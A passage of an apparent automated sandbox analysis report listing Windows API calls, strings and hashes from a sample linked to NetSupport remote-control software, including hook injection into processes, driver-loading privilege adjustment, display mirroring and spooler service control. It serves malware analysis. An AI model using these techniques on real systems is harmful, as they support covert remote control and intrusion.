                                                                                                                        • __wcsicoll.LIBCMT ref: 00AFF5CC
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AFF5E4
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AFF61F
                                                                                                                        • _wcschr.LIBCMT ref: 00AFF69F
                                                                                                                        • _wcschr.LIBCMT ref: 00AFF6C7
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000002,?,?), ref: 00AFF745
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AFF76B
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$__wcsicoll_memset_wcschrwsprintf$AddressCreateDisplayEnumLoadLocalProcSettingsTime_mallocwvsprintf
                                                                                                                        • String ID: After cds, code0=%d$After cds2$Attach.RelativeX$Attach.RelativeY$Attach.ToDesktop$Before cds0$Before cds1$Before cds2$ChangeDisplaySettingsExW$EnableMirror(%d,%d)$EnumDisplayDevicesW$Error x%x opening %s$Error: Unknown devkey fmt %s from EnumDisplayDevices$Error: gdihook5 not found in EnumDisplayDevices$USER32$\CONTROL\VIDEO$\SERVICES$gdihook5$gdihook5$pci gdihook5
                                                                                                                        APIs
                                                                                                                        • InterlockedIncrement.KERNEL32(00B8C2E0), ref: 00B210B6
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_300.DLL,00000000,00000002,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL), ref: 00B211B4
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_250.DLL,00000000,00000002,NSMRES_250.DLL,NSMRES_250.DLL,NSMRES_250.DLL), ref: 00B21296
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_200.DLL,00000000,00000002,NSMRES_200.DLL,NSMRES_200.DLL,NSMRES_200.DLL), ref: 00B21378
                                                                                                                        • LoadLibraryExW.KERNEL32(NSSRESDM_150.DLL,00000000,00000002,NSSRESDM_150.DLL,NSSRESDM_150.DLL,NSSRESDM_150.DLL), ref: 00B21478
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_125.DLL,00000000,00000002,NSMRES_125.DLL,NSMRES_125.DLL,NSMRES_125.DLL), ref: 00B21557
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES.DLL,00000000,00000002,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL), ref: 00B21656
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$IncrementInterlocked
                                                                                                                        • String ID: ..\CTL32\util.cpp$NSMRES.DLL$NSMRESDM_150.DLL$NSMRES_125.DLL$NSMRES_150.DLL$NSMRES_200.DLL$NSMRES_250.DLL$NSMRES_300.DLL$NSSRES.DLL$NSSRESDM_150.DLL$NSSRES_125.DLL$NSSRES_150.DLL$NSSRES_200.DLL$NSSRES_250.DLL$NSSRES_300.DLL$dpi != -1$x
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 00B10D4E
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B10D6C
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B10DF9
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B10E08
                                                                                                                        • FindFirstFileW.KERNEL32(c:\users\*.*,?), ref: 00B10E38
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B10F04
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B10F2C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$__wcsicoll$CloseNext
                                                                                                                        • String ID: IsA()$c:\users\%s\AppData\Local\VirtualStore\%s$c:\users\%s\AppData\Roaming\%s$c:\users\*.*$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$sysinfo.scp
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00B22303
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00B2230A
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 00B22321
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00B2234D
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00B2236D
                                                                                                                        • _malloc.LIBCMT ref: 00B22376
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00B2239A
                                                                                                                        • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,?), ref: 00B223DC
                                                                                                                        • _free.LIBCMT ref: 00B2240A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2241F
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$InformationLookupPrivilegeProcess$AdjustCloseCurrentHandleNameOpenPrivilegesValue_free_malloc
                                                                                                                        • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s$SeLoadDriverPrivilege
                                                                                                                        APIs
                                                                                                                        • lstrcmpiW.KERNEL32(?,00B74BF8), ref: 00B2CDEF
                                                                                                                          • Part of subcall function 00B2B310: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00B2B389
                                                                                                                          • Part of subcall function 00B2B310: GetLastError.KERNEL32 ref: 00B2B39B
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastManagerOpenlstrcmpi
                                                                                                                        • String ID: (null)$Application\PCIapp$C:\Windows\Installer\$Do Install (%d), params=<%s>$Done Install$PCIAX.DLL$Software\Microsoft\Windows\CurrentVersion\Uninstall\ProxyHost$System\PCIsys$gdihook4$iRemovedTS=%d$localmon$pcimon
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00B24B11
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B24B6E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B24B80
                                                                                                                        • GetModuleFileNameW.KERNEL32(00AE0000,?,000000F6), ref: 00B24B95
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B24BDD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B24BE9
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B24C71
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseFirst$CopyDirectoryModuleNameSystem
                                                                                                                        • String ID: localmon$localmon.dll$pcimon$pcimon.dll
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B244E1
                                                                                                                        • IsIconic.USER32(?), ref: 00B244EE
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00B244FD
                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00B24512
                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00B24519
                                                                                                                        • IsIconic.USER32(?), ref: 00B24543
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B24552
                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00B24578
                                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00B24588
                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00B24594
                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00B245A4
                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00B245BC
                                                                                                                        Similarity
                                                                                                                        • API ID: MetricsSystem$RectWindow$Iconic$Client
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(?), ref: 00B16A37
                                                                                                                        • GlobalAlloc.KERNEL32(00002002,?), ref: 00B16A69
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B16A72
                                                                                                                        • _memmove.LIBCMT ref: 00B16A7B
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B16A84
                                                                                                                        • EmptyClipboard.USER32 ref: 00B16A8A
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00B16A93
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B16A9E
                                                                                                                        • MessageBeep.USER32(00000030), ref: 00B16AA6
                                                                                                                        • CloseClipboard.USER32 ref: 00B16AAC
                                                                                                                        Similarity
                                                                                                                        • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B1A71E
                                                                                                                        • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00B1A730
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00B1A762
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00B1A782
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1A78D
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B1A7B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary$AddressAllocateErrorInitializeLastLoadOpenProcVersion_memset_wcsncpy
                                                                                                                        • String ID: Advapi32.dll$CheckTokenMembership
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000002), ref: 00B08FC2
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B08FCF
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00B08FD8
                                                                                                                        • GetDC.USER32(00000000), ref: 00B08FE2
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 00B0900E
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B09015
                                                                                                                        • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 00B0902C
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B09037
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B0903E
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Palette$BitmapCreateDeleteFindLoadLockObjectRealizeReleaseSelect
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00AF83BC
                                                                                                                        • CoCreateInstance.OLE32(00B6B4B8,00000000,00000001,00B6B4D4,?), ref: 00AF8402
                                                                                                                        • CoUninitialize.OLE32 ref: 00AF84DD
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                                                        • String ID: Disabled $Enabled $Removed
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00B24459
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00B24460
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00B24475
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00B24499
                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00B244A3
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentExitLoadLookupOpenPrivilegePrivilegesStringValueWindowswvsprintf
                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00AFEAC6
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AFEACD
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 00AFEAE2
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00AFEB06
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AFEB10
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID: SeLoadDriverPrivilege
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00B52DAD,?,00B43632,?,000000BC,?,00000001,00000000,00000000), ref: 00B52783
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00B52DAD,?,00B43632,?,000000BC,?,00000001,00000000,00000000), ref: 00B527AC
                                                                                                                        • GetACP.KERNEL32(?,?,00B52DAD,?,00B43632,?,000000BC,?,00000001,00000000), ref: 00B527C0
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B3FA2B
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3FA40
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00B7B7A0), ref: 00B3FA4B
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3FA67
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B3FA6E
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(000F01FF), ref: 00AFC08D
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AFC094
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AFC0A5
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 00AFC0C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2349140579-0
                                                                                                                        • Opcode ID: eb1f4f114d16a7cc5b40468e7f3b114276c43a74df61856477439d2ed0b7197e
                                                                                                                        • Instruction ID: 06f3493843f7b8f1fcf1785abc8208ad59f31788003f67b3e85bbdb791bb97ba
                                                                                                                        • Opcode Fuzzy Hash: eb1f4f114d16a7cc5b40468e7f3b114276c43a74df61856477439d2ed0b7197e
                                                                                                                        • Instruction Fuzzy Hash: 5E0108B2600208ABD710DF98DD49FAABBBCEF48701F10455DFA4597291DBF5A904CBA2
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,?,00000000,00000000,?,00AFD67C,0000025E,cant create events), ref: 00AFC10C
                                                                                                                        • CloseHandle.KERNEL32(?,?,00AFD67C,0000025E,cant create events), ref: 00AFC115
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: dbb857cb872ad4e6eca5ac838e6464edd2ce09eab10d1089a30a3a2f5c95a958
                                                                                                                        • Instruction ID: 6f8b7451425f699e3192f5e610476f42b83340da705bcd21f893cb23c3c70cec
                                                                                                                        • Opcode Fuzzy Hash: dbb857cb872ad4e6eca5ac838e6464edd2ce09eab10d1089a30a3a2f5c95a958
                                                                                                                        • Instruction Fuzzy Hash: 40E0EC71200614ABD7388F55AD45FA273AC9F04B11F10061EF942D71C1CAB4E8408A68
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 58c39780222df08044872804bb294191c8dcf6666db8626385027f3b6b1a0160
                                                                                                                        • Instruction ID: 381c2865486c0c128c465e8c3d4727c659fd78093c725580c5977e5cf6f72690
                                                                                                                        • Opcode Fuzzy Hash: 58c39780222df08044872804bb294191c8dcf6666db8626385027f3b6b1a0160
                                                                                                                        • Instruction Fuzzy Hash: 58F027B878422126EE3072647C13B7A25D2F714B04FC809F0FA1ECA2F6FEED59465256
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B30547
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B30560
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B3059B
                                                                                                                        • GetProcAddress.KERNEL32(?,MySetHook), ref: 00B305CB
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B305F3
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00B30607
                                                                                                                        • wsprintfW.USER32 ref: 00B3065C
                                                                                                                        • CreateEventW.KERNEL32(?,00000000,00000000,?), ref: 00B30674
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B3068C
                                                                                                                        • SendMessageW.USER32(00000000), ref: 00B30693
                                                                                                                        • Sleep.KERNEL32(0000000F), ref: 00B3069B
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9791
                                                                                                                          • Part of subcall function 00AE9770: GetWindowLongW.USER32(00000000,000000F0), ref: 00AE97A4
                                                                                                                          • Part of subcall function 00AE9770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 00AE97C2
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9839
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000F), ref: 00B306C9
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,NSMViewPaused), ref: 00B30701
                                                                                                                        • IsWindow.USER32(?), ref: 00B30721
                                                                                                                        • GetClassNameW.USER32(?,?,00000080), ref: 00B3073C
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00B307BC
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00B307F8
                                                                                                                        • IsWindow.USER32(?), ref: 00B30811
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0000000F), ref: 00B30851
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B30993
                                                                                                                          • Part of subcall function 00B30220: SendInput.USER32(00000002,?,0000001C), ref: 00B30287
                                                                                                                        • Sleep.KERNEL32(00000032), ref: 00B308B2
                                                                                                                        • IsWindow.USER32(?), ref: 00B308FE
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000F), ref: 00B3091A
                                                                                                                        • GetProcAddress.KERNEL32(?,MyUnhook), ref: 00B309C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B309EC
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B30A00
                                                                                                                        • OpenProcess.KERNEL32(00000600,00000000,?), ref: 00B30A19
                                                                                                                        • OpenProcess.KERNEL32(00000200,00000000,?), ref: 00B30A2E
                                                                                                                        • GetPriorityClass.KERNEL32(00000000), ref: 00B30A37
                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00B30A4C
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Process$Wait$ClassEventObjectOpenSingle$AddressCreateDesktopFindLibraryLoadNamePriorityProcSendSleepThread$AttributeFileInputLongMessageModuleMultipleObjectsVisiblewsprintf
                                                                                                                        • String ID: Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$\NSL\$winsthooks.dll
                                                                                                                        • API String ID: 1121615632-101993463
                                                                                                                        • Opcode ID: 2c087d1cf34d27de7bbeb5bb2718651e3f822207616a0f93c69787b54c1c08b5
                                                                                                                        • Instruction ID: 8461373cc07c06c5d7095705008be8a2c76bdc699f4caa4be0c28db242ef064a
                                                                                                                        • Opcode Fuzzy Hash: 2c087d1cf34d27de7bbeb5bb2718651e3f822207616a0f93c69787b54c1c08b5
                                                                                                                        • Instruction Fuzzy Hash: 24D1F3B19103159BEB30AB64DC99BAA73F8EF50704F1041D8E60DA72D2EBB49E84CF55
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00B23308
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2333A
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,spooler,00000034), ref: 00B2335C
                                                                                                                        • GetLastError.KERNEL32 ref: 00B23364
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2338B
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00B233D7
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B233F8
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B2340F
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2341D
                                                                                                                        • GetLastError.KERNEL32 ref: 00B23455
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B23547
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B23561
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B2356C
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 00B23595
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$ErrorLastQueryStatus$CloseHandleOpenSleepwsprintf$DirectoryLocalManagerStartSystemTime_mallocwvsprintf
                                                                                                                        • String ID: Attempt to start the service$Attempt to stop the service$ControlService failed with %d$START$STOP$Serivce isn't in Stopped state$Service Manager : %08x - %d$Service State : %d$Service is running$Service is stopped$Service isn't running$Service started ok$Service stopped ok$Servive failed to start after 60 seconds$Servive failed to stop after 60 seconds$StartService failed with %d$StartService ok$Use old method$\net$close service manager$close spooler service$hSpooler %08x - %d$spooler$spooler (%s)$spooler finished$start$stop
                                                                                                                        • API String ID: 361844234-1626732039
                                                                                                                        • Opcode ID: 20fcbc77927611a03c8a5a6f2567c8bfedcd7613cb8d8bd31b703b73d65352b7
                                                                                                                        • Instruction ID: 570be36a44cf20c8e81eeb820fd8c9914ee6d0f8bcd5b1b24a377f6d97ba58be
                                                                                                                        • Opcode Fuzzy Hash: 20fcbc77927611a03c8a5a6f2567c8bfedcd7613cb8d8bd31b703b73d65352b7
                                                                                                                        • Instruction Fuzzy Hash: 1371F870A412256BDB206B54BC86FBA72F8EF14F04F1040F4F41DA62A2DAB59F458B67
                                                                                                                        APIs
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000421,0000000E,?,?), ref: 00B2A86D
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2A87E
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B2A885
                                                                                                                        • GetDlgItemTextA.USER32(?,00000421,00B90F06,00000050), ref: 00B2A8C0
                                                                                                                        • GetDlgItemTextA.USER32(?,00000422,00B90EEA,0000000A), ref: 00B2A8EB
                                                                                                                        • GetDlgItemTextA.USER32(?,00000423,00B90EF4,00000006), ref: 00B2A8FA
                                                                                                                        • GetDlgItemTextW.USER32(?,00000424,?,00000050), ref: 00B2A90B
                                                                                                                        • LoadStringW.USER32(00AE0000,00000415,?,00000050), ref: 00B2A922
                                                                                                                        • GetDlgItemTextW.USER32(?,00000425,?,00000050), ref: 00B2A95C
                                                                                                                        • EndDialog.USER32(?,?), ref: 00B2A977
                                                                                                                        • GetDlgItem.USER32(?,0000042E), ref: 00B2A9C4
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2A9C7
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00B2A9CE
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2A9D1
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000421,000000CF,00000001,00000000), ref: 00B2A9E2
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000422,000000CF,00000001,00000000), ref: 00B2A9F7
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000423,000000CF,00000001,00000000), ref: 00B2AA0C
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000424,000000CF,00000001,00000000), ref: 00B2AA21
                                                                                                                        • GetDlgItem.USER32(?,00000425), ref: 00B2AA2F
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AA32
                                                                                                                        • GetDlgItem.USER32(?,00000431), ref: 00B2AA3C
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AA3F
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000421,000000C5,0000004F,00000000), ref: 00B2AA50
                                                                                                                        • SetDlgItemTextA.USER32(?,00000421,00B90F06), ref: 00B2AA61
                                                                                                                        • SetDlgItemTextA.USER32(?,00000422,00B90EEA), ref: 00B2AA72
                                                                                                                        • SetDlgItemTextA.USER32(?,00000423,00B90EF4), ref: 00B2AA83
                                                                                                                        • wsprintfW.USER32 ref: 00B2AAC7
                                                                                                                        • SetDlgItemTextW.USER32(?,00000424,?), ref: 00B2AADD
                                                                                                                        • GetDlgItem.USER32(?,00000422), ref: 00B2AAF4
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AAF7
                                                                                                                        • GetDlgItem.USER32(?,00000423), ref: 00B2AB01
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB04
                                                                                                                        • GetDlgItem.USER32(?,00000424), ref: 00B2AB0E
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB11
                                                                                                                        • GetDlgItem.USER32(?,00000425), ref: 00B2AB1B
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB1E
                                                                                                                        • GetDlgItem.USER32(?,00000431), ref: 00B2AB28
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB2B
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2AB41
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B2AB44
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
